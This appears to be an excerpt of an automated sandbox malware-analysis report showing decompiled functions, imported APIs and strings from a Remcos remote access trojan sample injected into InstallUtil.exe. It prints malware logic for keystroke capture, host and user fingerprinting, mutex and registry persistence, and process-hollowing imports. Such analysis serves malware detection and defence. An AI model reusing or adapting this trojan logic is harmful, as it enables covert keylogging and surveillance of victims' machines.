GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,00000001,0040C650), ref: 0040CE8D
GetProcAddress.KERNEL32(00000000), ref: 0040CE90
LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,00000001,0040C650), ref: 0040CEA2
GetProcAddress.KERNEL32(00000000), ref: 0040CEA5
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,00000001,0040C650), ref: 0040CEBB
GetProcAddress.KERNEL32(00000000), ref: 0040CEBE
LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000001,0040C650), ref: 0040CECF
GetProcAddress.KERNEL32(00000000), ref: 0040CED2
LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,00000001,0040C650), ref: 0040CEE3
GetProcAddress.KERNEL32(00000000), ref: 0040CEE6
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,00000001,0040C650), ref: 0040CEF8
GetProcAddress.KERNEL32(00000000), ref: 0040CEFB
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,00000001,0040C650), ref: 0040CF08
GetProcAddress.KERNEL32(00000000), ref: 0040CF0B
LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,00000001,0040C650), ref: 0040CF1C
GetProcAddress.KERNEL32(00000000), ref: 0040CF1F
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,00000001,0040C650), ref: 0040CF2C
GetProcAddress.KERNEL32(00000000), ref: 0040CF2F
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,00000001,0040C650), ref: 0040CF41
GetProcAddress.KERNEL32(00000000), ref: 0040CF44
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,00000001,0040C650), ref: 0040CF51
GetProcAddress.KERNEL32(00000000), ref: 0040CF54
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,00000001,0040C650), ref: 0040CF61
GetProcAddress.KERNEL32(00000000), ref: 0040CF64
GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,00000001,0040C650), ref: 0040CF75
GetProcAddress.KERNEL32(00000000), ref: 0040CF78
LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,00000001,0040C650), ref: 0040CF86
GetProcAddress.KERNEL32(00000000), ref: 0040CF89

Strings

kernel32, xrefs: 0040CEED, 0040CEF7, 0040CF02, 0040CF26
ntdll.dll, xrefs: 0040CECA
SetProcessDEPPolicy, xrefs: 0040CF21
GetMonitorInfoW, xrefs: 0040CF56
Psapi.dll, xrefs: 0040CE68, 0040CE9D
kernel32.dll, xrefs: 0040CED9, 0040CF6B
EnumDisplayMonitors, xrefs: 0040CF46
GetComputerNameExW, xrefs: 0040CEFD
GlobalMemoryStatusEx, xrefs: 0040CED4
GetSystemTimes, xrefs: 0040CF66
Shlwapi.dll, xrefs: 0040CF7C
GetModuleFileNameExW, xrefs: 0040CE97, 0040CE9C, 0040CEB5
0:v@O-t, xrefs: 0040CF3B
NtUnmapViewOfSection, xrefs: 0040CEC5
user32, xrefs: 0040CF36, 0040CF40, 0040CF4B, 0040CF5B
GetModuleFileNameExA, xrefs: 0040CE62, 0040CE67, 0040CE87
IsWow64Process, xrefs: 0040CEE8
EnumDisplayDevicesW, xrefs: 0040CF31
Kernel32.dll, xrefs: 0040CE88, 0040CEB6
IsUserAnAdmin, xrefs: 0040CF0D
Rv, xrefs: 0040CF81
Shell32, xrefs: 0040CF12

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule$LibraryLoad
String ID: Rv$0:v@O-t$EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$user32
API String ID: 551388010-2073788189
Opcode ID: 43b925e552e5baf02bd9721a00a74f41a809ff5129cb75e0d768a7e8c0109cfd
Instruction ID: e53d2819f5ab833264721e4a6df811b5f9d97970b720a2c2ed5f3284e83987ef
Opcode Fuzzy Hash: 43b925e552e5baf02bd9721a00a74f41a809ff5129cb75e0d768a7e8c0109cfd
Instruction Fuzzy Hash: DF311EA0F4131C7ADB107BB6EC49E1B3E9CDA847557290427F90497160FBBDD8008EAE

Uniqueness

Uniqueness Score: -1.00%

Function 00408B9A Relevance: 9.1, APIs: 6, Instructions: 54
keyboardthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00408B9A(void* __ecx, intOrPtr _a4) {
				long _v8;
				void _v38;
				short _v40;
				char _v296;
				void* __ebx;
				void* __edi;
				void* __ebp;
				struct HWND__* _t18;
				struct HKL__* _t20;
				void* _t30;
				signed int _t32;
				void* _t36;
				void* _t37;
				void* _t41;

				_t30 = __ecx;
				E004337A0(_t37,  &_v296, 0, 0x100);
				_v40 = 0;
				_t32 = 7;
				memset( &_v38, 0, _t32 << 2);
				asm("stosw"); // executed
				_t18 = GetForegroundWindow(); // executed
				_t20 = GetKeyboardLayout(GetWindowThreadProcessId(_t18,  &_v8));
				GetKeyState(0x10);
				GetKeyboardState( &_v296);
				_t9 = _t30 + 0x50; // 0x5b
				_t10 = _t30 + 0x4c; // 0x5b
				ToUnicodeEx( *_t10,  *_t9,  &_v296,  &_v40, 0x10, 0, _t20);
				E0040413E(_t30, _a4, _t36, _t41,  &_v40);
				return _a4;
			}

0x00408bb1
0x00408bb6
0x00408bc3
0x00408bc9
0x00408bca
0x00408bcc
0x00408bce
0x00408be0
0x00408bea
0x00408bf7
0x00408c0d
0x00408c10
0x00408c13
0x00408c20
0x00408c2e

APIs

GetForegroundWindow.USER32(0046E3A8,?,0046E3A8), ref: 00408BCE
GetWindowThreadProcessId.USER32(00000000,?), ref: 00408BD9
GetKeyboardLayout.USER32(00000000), ref: 00408BE0
GetKeyState.USER32(00000010), ref: 00408BEA
GetKeyboardState.USER32(?), ref: 00408BF7
ToUnicodeEx.USER32(0000005B,0000005B,?,?,00000010,00000000,00000000), ref: 00408C13

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
String ID:
API String ID: 3566172867-0
Opcode ID: 948a40d59b5c6c784c9d44c9a89de6858e64e2d2692255a54a1a9a25f5ddf5ee
Instruction ID: 7da8684ef6d527c699a06cf7657daa54a6c573ffa1226931308c06a0ed1158a4
Opcode Fuzzy Hash: 948a40d59b5c6c784c9d44c9a89de6858e64e2d2692255a54a1a9a25f5ddf5ee
Instruction Fuzzy Hash: DF115671A00308ABDB10DBE0EC49FDA77BCEB4C716F000465FA04DA151E675E9548B64

Uniqueness

Uniqueness Score: -1.00%

Function 0040D26E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E0040D26E() {
				signed int _v32;
				void* _t13;
				void* _t22;
				char* _t62;
				signed int _t63;
				void* _t65;
				void* _t66;
				void* _t68;

				_t65 = (_t63 & 0xfffffff8) - 0x1c;
				_t62 = L"pth_unenc";
				while(1) {
					_v32 = _v32 & 0x00000000;
					_t52 = E00401F6B(0x46e5a0); // executed
					E00410AC0(_t10, "override",  &_v32); // executed
					_t13 = _v32 - 1;
					if(_t13 == 0) {
						goto L5;
					}
					_t22 = _t13 - 1;
					if(_t22 == 0) {
						_push(1);
						_t69 = _t65 - 0x18;
						E0040773A(0x46e588, _t65 - 0x18, _t52, __eflags, 0x46e588);
						_push(_t62);
						E00410D87(0x80000001, E00401EC4(E00418385( &_v32, 0x46e5a0)));
						E00401EC9();
						_push(1);
						E00402053(0x46e588, _t69 + 0x20 - 0x18, _t25, _t62, "3.5.1 Pro");
						_push("v");
						E00410CE2(0x46e5a0, E00401F6B(0x46e5a0));
						E0041030A();
						ExitProcess(0);
					}
					_t76 = _t22 != 1;
					if(_t22 != 1) {
						L6:
						Sleep(0xbb8); // executed
						continue;
					}
					E0040AED1();
					L5:
					_push(1);
					_t66 = _t65 - 0x18;
					E0040773A(0x46e588, _t66, _t52, _t76, 0x46e588);
					_push(_t62);
					E00410D87(0x80000001, E00401EC4(E00418385( &_v32, 0x46e5a0)));
					E00401EC9();
					_push(1);
					_t68 = _t66 + 0x20 - 0x18;
					E00402053(0x46e588, _t68, _t16, _t62, "3.5.1 Pro");
					_push("v");
					E00410CE2(0x46e5a0, E00401F6B(0x46e5a0));
					_t65 = _t68 + 0x20;
					goto L6;
				}
			}

0x0040d274
0x0040d284
0x0040d289
0x0040d289
0x0040d29f
0x0040d2a1
0x0040d2ac
0x0040d2af
0x00000000
0x00000000
0x0040d2b1
0x0040d2b4
0x0040d32f
0x0040d331
0x0040d337
0x0040d33c
0x0040d356
0x0040d362
0x0040d367
0x0040d373
0x0040d378
0x0040d386
0x0040d38e
0x0040d395
0x0040d395
0x0040d2b6
0x0040d2b9
0x0040d31f
0x0040d324
0x00000000
0x0040d324
0x0040d2bb
0x0040d2c0
0x0040d2c0
0x0040d2c2
0x0040d2c8
0x0040d2cd
0x0040d2e7
0x0040d2f3
0x0040d2f8
0x0040d2fa
0x0040d304
0x0040d309
0x0040d317
0x0040d31c
0x00000000
0x0040d31c

APIs

Part of subcall function 00410AC0: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00410AE0
Part of subcall function 00410AC0: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046E5A0), ref: 00410AFE
Part of subcall function 00410AC0: RegCloseKey.KERNELBASE(?), ref: 00410B09

Sleep.KERNELBASE(00000BB8), ref: 0040D324
ExitProcess.KERNEL32 ref: 0040D395

Strings

override, xrefs: 0040D293
pth_unenc, xrefs: 0040D284, 0040D2CD, 0040D33C
3.5.1 Pro, xrefs: 0040D2FF, 0040D36E

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 3.5.1 Pro$override$pth_unenc
API String ID: 2281282204-2766964638
Opcode ID: d42db16a73d2b299e34e6e701a5e5d38101fba342da901ceb8717055ad643507
Instruction ID: d1120813b3f21031d6dd82f740c6fbd7598bde36b3a99e6f3a72782d7190e4a5
Opcode Fuzzy Hash: d42db16a73d2b299e34e6e701a5e5d38101fba342da901ceb8717055ad643507
Instruction Fuzzy Hash: 5C21E431B503002BD60876768C57AAE328A6B81708F50452EF802662D7FEBD998143DF

Uniqueness

Uniqueness Score: -1.00%

Function 00404F28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58
timethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00404F28(void* __ecx, intOrPtr _a4, char _a8) {
				struct _SYSTEMTIME _v20;
				char _v44;
				void* __edi;
				void* __ebp;
				void* _t16;
				void* _t21;
				intOrPtr _t29;
				void* _t31;
				void* _t32;
				void* _t33;

				_t31 = __ecx;
				if( *((char*)(__ecx + 0x5c)) != 0) {
					__eflags = 0;
					return 0;
				}
				_t29 = _a4;
				if(_a8 != 0) {
					__eflags =  *0x46dd00;
					if( *0x46dd00 != 0) {
						GetLocalTime( &_v20);
						_t16 = E004182D1(_t21,  &_v44, _t29);
						_t34 = _t33 - 0x18;
						E004052D4(_t21, _t33 - 0x18, "Connection KeepAlive  | Enabled | Timeout: ", _t32, __eflags, _t16);
						E00402053(_t21, _t34 - 0x14, "Connection KeepAlive  | Enabled | Timeout: ", _t32, "i");
						E00417D02(_t21, _t29);
						E00401F98();
					}
				} else {
					 *((char*)(__ecx + 0x7c)) = 1;
				}
				 *((intOrPtr*)(_t31 + 0x74)) = _t29;
				 *((char*)(_t31 + 0x5c)) = 1;
				 *((intOrPtr*)(_t31 + 0x60)) = CreateEventA(0, 0, 0, 0);
				CreateThread(0, 0, E00405127, _t31, 0, 0); // executed
				return 1;
			}

0x00404f2f
0x00404f36
0x00404fc1
0x00000000
0x00404fc1
0x00404f40
0x00404f43
0x00404f4b
0x00404f52
0x00404f58
0x00404f63
0x00404f68
0x00404f73
0x00404f82
0x00404f87
0x00404f92
0x00404f92
0x00404f45
0x00404f45
0x00404f45
0x00404f97
0x00404fa0
0x00404fb4
0x00404fb7
0x00000000

APIs

GetLocalTime.KERNEL32(?), ref: 00404F58
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FA4
CreateThread.KERNELBASE ref: 00404FB7

Strings

Cv, xrefs: 00404FB7
Connection KeepAlive | Enabled | Timeout: , xrefs: 00404F6B

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: Connection KeepAlive | Enabled | Timeout: $Cv
API String ID: 2532271599-1310892454
Opcode ID: 576fe39332595e36781d7cb5d99bdc465d064b268043dbba1b145fb5da2b35e9
Instruction ID: d000502f81133dfc4abed3a50014e83e98711da89c200911bc51b302f97f34d6
Opcode Fuzzy Hash: 576fe39332595e36781d7cb5d99bdc465d064b268043dbba1b145fb5da2b35e9
Instruction Fuzzy Hash: 8A1127718003846BCB20B7779C0DAAB7FB8DBD2304F00416FF401621C1D6B89481CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00417E20 Relevance: 3.0, APIs: 2, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00417E20(void* __ecx, void* __edx, void* __edi, void* __eflags) {
				char _v8;
				long _v12;
				char _v36;
				char _v60;
				char _v92;
				short _v604;
				void* __ebp;
				void* _t26;
				void* _t35;
				void* _t39;
				void* _t40;
				void* _t41;

				_t41 = __eflags;
				_t35 = __edx;
				_v8 = 0x10;
				_t39 = __ecx;
				 *0x46dea4(1,  &_v92,  &_v8); // executed
				_v12 = 0x100;
				GetUserNameW( &_v604,  &_v12); // executed
				E00402FD4(_t26, _t39, E004042BC(_t26,  &_v36,  &_v92, _t40, _t41, E0040413E(_t26,  &_v60, _t35, _t40, "/")), __edi, _t40, _t41,  &_v604);
				E00401EC9();
				E00401EC9();
				return _t39;
			}

0x00417e20
0x00417e20
0x00417e2d
0x00417e38
0x00417e3d
0x00417e46
0x00417e55
0x00417e80
0x00417e89
0x00417e91
0x00417e9c

APIs

GetComputerNameExW.KERNEL32(00000001,?,00000037,0046E600), ref: 00417E3D
GetUserNameW.ADVAPI32(?,00000010), ref: 00417E55

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Name$ComputerUser
String ID:
API String ID: 4229901323-0
Opcode ID: ab7916ae7f281988d52d5737a4608a67ebbc609fc9bb9014e12e4135e60b441a
Instruction ID: 80a01cbd77c97b4f1a2cf110af2dd5b8c062d9d1aae85597091ace35d732fe0b
Opcode Fuzzy Hash: ab7916ae7f281988d52d5737a4608a67ebbc609fc9bb9014e12e4135e60b441a
Instruction Fuzzy Hash: A401127290011DABCB04EBD1DC45ADEB7BCEF44309F1001ABF905B7195EEB46A898B98

Uniqueness

Uniqueness Score: -1.00%

Function 00431495 Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00431495() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E004314A1); // executed
				return _t1;
			}

0x0043149a
0x004314a0

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_000314A1,004311C8), ref: 0043149A

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a482db5cbd8483212d6586fce34e842ad419a1a270e0650f29ba0b8240e57ce5
Instruction ID: 6638a1f7829419bbe7e05c502f7de8475a6af96e41fc6a415c287828778d49fa
Opcode Fuzzy Hash: a482db5cbd8483212d6586fce34e842ad419a1a270e0650f29ba0b8240e57ce5
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3E8 Relevance: 65.5, APIs: 17, Strings: 20, Instructions: 784
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E0040C3E8(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a12) {
				char _v524;
				char _v700;
				char _v720;
				char _v724;
				char _v728;
				char _v744;
				char _v756;
				char _v760;
				char _v772;
				struct _SECURITY_ATTRIBUTES* _v776;
				signed int _v780;
				char _v784;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t67;
				void* _t70;
				void* _t75;
				void** _t83;
				CHAR* _t88;
				long _t90;
				int _t92;
				char _t95;
				void* _t96;
				void* _t100;
				void* _t116;
				void* _t117;
				void* _t124;
				char _t130;
				char* _t135;
				signed char* _t137;
				signed char* _t139;
				void* _t142;
				void* _t144;
				void* _t158;
				void* _t161;
				void* _t163;
				void* _t164;
				intOrPtr _t180;
				intOrPtr* _t183;
				void* _t185;
				void* _t191;
				char* _t194;
				void* _t197;
				char* _t200;
				void* _t207;
				void* _t213;
				void* _t214;
				signed int _t215;
				char* _t222;
				void* _t224;
				char* _t227;
				char* _t229;
				intOrPtr* _t231;
				void* _t233;
				intOrPtr* _t241;
				void* _t243;
				void* _t251;
				void* _t271;
				struct _SECURITY_ATTRIBUTES* _t272;
				int _t274;
				intOrPtr* _t289;
				char* _t366;
				signed int _t388;
				signed int _t392;
				int _t394;
				signed int _t400;
				signed int _t417;
				void* _t439;
				void* _t441;
				signed int _t463;
				void* _t467;
				char* _t468;
				char* _t471;
				intOrPtr* _t484;
				void* _t487;
				void* _t488;
				void* _t489;
				void* _t491;
				signed int _t494;
				signed int _t496;
				void* _t499;
				void* _t500;
				void* _t501;
				void* _t503;
				void* _t505;
				void* _t506;
				void* _t507;
				void* _t508;
				void* _t509;
				void* _t513;

				_t455 = __edx;
				_t494 = _t496;
				 *0x46dd20 = _a4;
				_push(_t271);
				E0040CDA7(_a4,  &_v724, __edx, __eflags);
				_t499 = (_t496 & 0xfffffff8) - 0x2f4;
				E004020B6(_t271, _t499, __edx, __eflags, 0x46e624);
				_t500 = _t499 - 0x18;
				E004020B6(_t271, _t500, __edx, __eflags,  &_v728);
				_t67 = E0041851D( &_v756, __edx);
				_t501 = _t500 + 0x30;
				E0040D644(__edx, _t67);
				E00401E4D( &_v760, _t455);
				_t70 = E00438EB0(_a12, "-l");
				_t289 = _t467;
				if(_t70 != 0) {
					_t468 = 0x46e600;
					__eflags =  *((char*)(E00401F6B(E00401E25(0x46e600, _t455, _t494, __eflags, 3))));
					 *0x46daf6 = __eflags != 0;
					_t457 = E004052F5( &_v780, "Software\\", _t494, E00401E25(0x46e600, _t455, _t494, __eflags, 0xe));
					_t75 = E0040793B(_t271,  &_v756, _t74, 0x46e600, _t494, __eflags, "\\");
					_t477 = 0x46e5a0;
					E00401FA2(0x46e5a0, _t74, 0x46e5a0, _t75);
					E00401F98();
					E00401F98();
					L00405A7D(_t271, 0x46e654, _t74, "Exe");
					_t272 = 0;
					E00401E25(0x46e600, _t74, _t494, __eflags, 0x32);
					__eflags =  *(E004051BA(0));
					 *0x46dd03 = __eflags != 0;
					E00401E25(0x46e600, _t74, _t494, __eflags, 0x33);
					_t83 = E004051BA(0);
					__eflags =  *_t83;
					 *0x46dd58 =  *_t83 != 0;
					__eflags =  *0x46dd03 - _t272; // 0x0
					if(__eflags == 0) {
						L6:
						_v776 = _t272;
						E00401E25(_t468, _t457, _t494, __eflags, 0xd);
						_t458 = "0";
						__eflags = E0040ECD0(__eflags);
						if(__eflags != 0) {
							_t491 = OpenMutexA(0x100000, _t272, E00401F6B(E00401E25(_t468, "0", _t494, __eflags, 7)));
							__eflags = _t491;
							if(_t491 != 0) {
								WaitForSingleObject(_t491, 0xea60);
								CloseHandle(_t491);
							}
							_t458 = E00401F6B(0x46e5a0);
							__eflags = E00410AC0(_t260, "Inj",  &_v776);
							if(__eflags != 0) {
								_t458 = E00401F6B(0x46e5a0);
								E00410F1D(_t262, __eflags, "Inj");
							}
						}
						E00401F80(0x46e5d0, E00401E25(_t468, _t458, _t494, __eflags, 0xe));
						_t88 = E00401F6B(0x46e5d0);
						_t274 = 1;
						CreateMutexA(0, 1, _t88); // executed
						_t90 = GetLastError();
						__eflags = _t90 - 0xb7;
						if(_t90 == 0xb7) {
							L40:
							E00401F98();
							_t92 = _t274;
							goto L3;
						} else {
							E0040CE58();
							GetModuleFileNameW(0, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe", 0x104);
							_t95 = E004186B9(0x46e5d0);
							_push(0x46e5d0);
							_t459 = 0x80000002;
							 *0x46dea8 = _t95;
							_t96 = E00410B1D( &_v772, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName"); // executed
							_t503 = _t501 + 0xc;
							_t480 = 0x46e63c;
							E00401FA2(0x46e63c, 0x80000002, 0x46e63c, _t96);
							E00401F98();
							__eflags =  *0x46dea8;
							if( *0x46dea8 == 0) {
								_push(" (32 bit)");
							} else {
								_push(" (64 bit)");
							}
							L00405354(_t274, 0x46e63c, _t459, _t468, _t494);
							_t100 =  *0x46dd18;
							__eflags = _t100;
							if(_t100 != 0) {
								 *0x46c9c0 =  *_t100();
							}
							__eflags = _v776;
							if(__eflags == 0) {
								_t439 = E00401E25(_t468, _t459, _t494, __eflags, 0x2e);
								__eflags =  *((char*)(E00401F6B(_t439)));
								if(__eflags != 0) {
									__eflags =  *0x46dd18;
									if(__eflags != 0) {
										__eflags =  *0x46c9c0;
										if( *0x46c9c0 == 0) {
											_t459 = E00401F6B(0x46e5a0);
											_t251 = E00410A76(0x46e5a0, _t250, "origmsc");
											_pop(_t441);
											__eflags = _t251;
											if(__eflags == 0) {
												E00405FCD(_t274, _t441, _t459);
											}
										} else {
											_push(_t439);
											_push(_t439);
											__eflags = E0040A885() - 0xffffffff;
											if(__eflags == 0) {
												E004060C7(__eflags);
											}
										}
									}
								}
							}
							__eflags =  *((char*)(E00401F6B(E00401E25(_t468, _t459, _t494, __eflags, 0x27))));
							if(__eflags != 0) {
								E0040D5E2();
							}
							L00409F8A(_t274, 0x46e570, _t459, E00401F6B(E00401E25(_t468, _t459, _t494, __eflags, 0xb)));
							__eflags =  *((char*)(E00401F6B(E00401E25(_t468, _t459, _t494, __eflags, 4))));
							 *0x46daf7 = __eflags != 0;
							__eflags =  *((char*)(E00401F6B(E00401E25(_t468, _t459, _t494, __eflags, 5))));
							 *0x46daf4 = __eflags != 0;
							__eflags =  *((char*)(E00401F6B(E00401E25(_t468, _t459, _t494, __eflags, 8))));
							 *0x46daf5 = __eflags != 0;
							__eflags =  *((char*)(E00401F6B(E00401E25(_t468, _t459, _t494, __eflags, 3))));
							if(__eflags != 0) {
								__eflags = E00438416(E00401F6B(E00401E25(_t468, _t459, _t494, __eflags, 0x30)));
								if(__eflags != 0) {
									_t241 = E00401F6B(E00401E25(_t468, _t459, _t494, __eflags, 9));
									_t480 = _t241;
									_t243 = E00401F6B(E00401E25(_t468, _t459, _t494, __eflags, 0x30));
									_t459 =  *_t241;
									E00401ED3(0x46e5b8,  *_t241, _t241, E0041905E( &_v780,  *_t241, _t243));
									E00401EC9();
								}
							}
							__eflags = _v776;
							if(_v776 != 0) {
								E004337A0(_t468,  &_v524, 0, 0x208);
								_t116 = E0040243C();
								_t117 = E00401F6B(0x46e5e8);
								_t460 = E00401F6B(0x46e5a0);
								E00410C6B(_t119, "exepath",  &_v524, 0x208, _t117, _t116);
								_t505 = _t503 + 0x20;
								L00409F8A(_t274, 0x46e588, _t119,  &_v524);
								_t471 = 0x46e600;
								goto L42;
							} else {
								__eflags =  *0x46daf6;
								if(__eflags == 0) {
									L00409F8A(_t274, 0x46e588, _t459, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe");
								} else {
									_t227 = E00401F6B(E00401E25(_t468, _t459, _t494, __eflags, 0x1e));
									_t229 = E00401F6B(E00401E25(0x46e600, _t459, _t494, __eflags, 0xc));
									_t417 = E00401E25(0x46e600, _t459, _t494, __eflags, 9);
									_t231 = E00401F6B(_t417);
									__eflags =  *_t227;
									__eflags =  *_t229;
									_t480 = 0x46e600;
									_push((_t417 & 0xffffff00 |  *_t227 != 0x00000000) & 0x000000ff);
									_t233 = E00401F6B(E00401E25(0x46e600, _t459, _t494,  *_t229, 0xa));
									E0040AAE9( *_t231, E00401F6B(E00401E25(0x46e600, _t459, _t494, __eflags, 0x30)), __eflags, _t233, ((_t417 & 0xffffff00 |  *_t227 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff);
									_t503 = _t503 + 0xc;
									_t274 = 1;
								}
								_t207 = E0040243C();
								_t463 = 2;
								_t400 =  ~(0 | __eflags > 0x00000000) | (_t207 + 0x00000001) * _t463;
								_push(_t400);
								_v780 = _t400;
								_t489 = E004310E6(_t400, (_t207 + 1) * _t463 >> 0x20, _t480, __eflags);
								__eflags = _t489;
								if(_t489 == 0) {
									_t489 = 0;
									__eflags = 0;
								} else {
									E004337A0(0x46e588, _t489, 0, _v780);
									_t503 = _t503 + 0xc;
								}
								E00439346(_t489, E00401EC4(0x46e588));
								_t213 = E0040243C();
								_t214 = E00401F6B(0x46e5e8);
								_t215 = E0040243C();
								E00410EBB(E00401F6B(0x46e5a0), __eflags, "exepath", _t489, 2 + _t215 * 2, _t214, _t213); // executed
								E004310EF(_t489);
								_t505 = _t503 + 0x1c;
								_t471 = 0x46e600;
								E00401E25(0x46e600, _t217, _t494, __eflags, 0xd);
								_t460 = "0";
								__eflags = E0040ECD0(__eflags);
								if(__eflags == 0) {
									L42:
									_push(_t274);
									_t124 = E00401F6B(E00401E25(_t471, _t460, _t494, __eflags, 0x34));
									_t506 = _t505 - 0x18;
									E00402053(_t274, _t506, _t460, _t494, _t124);
									_push("licence");
									_t461 = E00401F6B(0x46e5a0); // executed
									E00410CE2(0x46e5a0, _t126); // executed
									_t507 = _t506 + 0x20;
									_t130 = E004383EC(_t128, E00401F6B(E00401E25(_t471, _t126, _t494, __eflags, 0x28)));
									 *0x46dd00 = _t130;
									__eflags = _t130 - 2;
									if(_t130 != 2) {
										__eflags = _t130 - _t274;
										if(_t130 == _t274) {
											_t394 = 0;
											__eflags = 0;
											goto L46;
										}
									} else {
										_t394 = _t274;
										L46:
										E00419F77(_t274, _t394, _t461, _t471);
										__eflags = 0;
										CreateThread(0, 0, E00419D46, 0, 0, 0);
									}
									_t508 = _t507 - 0x18;
									E00402053(_t274, _t508, _t461, _t494, "Remcos Agent initialized");
									_t509 = _t508 - 0x18;
									E00402053(_t274, _t509, _t461, _t494, "i");
									E00417D02(_t274, _t471);
									_t501 = _t509 + 0x30;
									_t135 = E00401F6B(E00401E25(_t471, _t461, _t494, __eflags, 0x37));
									_t137 = E00401F6B(E00401E25(_t471, _t461, _t494, __eflags, 0x10));
									_t139 = E00401F6B(E00401E25(_t471, _t461, _t494, __eflags, 0xf));
									__eflags =  *_t135;
									_t477 = 0x46e600;
									_t142 = E004383EC(_t140, E00401F6B(E00401E25(0x46e600, _t461, _t494,  *_t135, 0x36)));
									_t144 = E00401F6B(E00401E25(0x46e600, _t461, _t494, __eflags, 0x11));
									E00408651(_t137, _t139, __eflags,  *_t139 & 0x000000ff,  *_t137 & 0x000000ff, E00401F6B(E00401E25(0x46e600, _t461, _t494, __eflags, 0x31)), _t144, _t142, (_t138 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff); // executed
									__eflags =  *((intOrPtr*)(E00401F6B(E00401E25(0x46e600, _t461, _t494, __eflags, 0x14)))) - 1;
									if(__eflags != 0) {
										_t468 = CreateThread;
									} else {
										_t197 = 2;
										_t488 = E00430E1B(_t461, 0x46e600, __eflags, _t197);
										 *_t488 = 0;
										_t392 = E00401E25(0x46e600, _t461, _t494, __eflags, 0x35);
										_t200 = E00401F6B(_t392);
										_t468 = __imp__CreateThread; // 0x76ec43e0
										__eflags =  *_t200;
										 *((char*)(_t488 + 1)) = _t392 & 0xffffff00 | __eflags != 0x00000000;
										CreateThread(0, 0, E00416832, _t488, 0, 0);
										_t477 = 0x46e600;
									}
									__eflags =  *((intOrPtr*)(E00401F6B(E00401E25(_t477, _t461, _t494, __eflags, 0x16)))) - 1;
									if(__eflags == 0) {
										_t191 = 2;
										_t487 = E00430E1B(_t461, _t477, __eflags, _t191);
										 *_t487 = 1;
										_t388 = E00401E25(0x46e600, _t461, _t494, __eflags, 0x35);
										_t194 = E00401F6B(_t388);
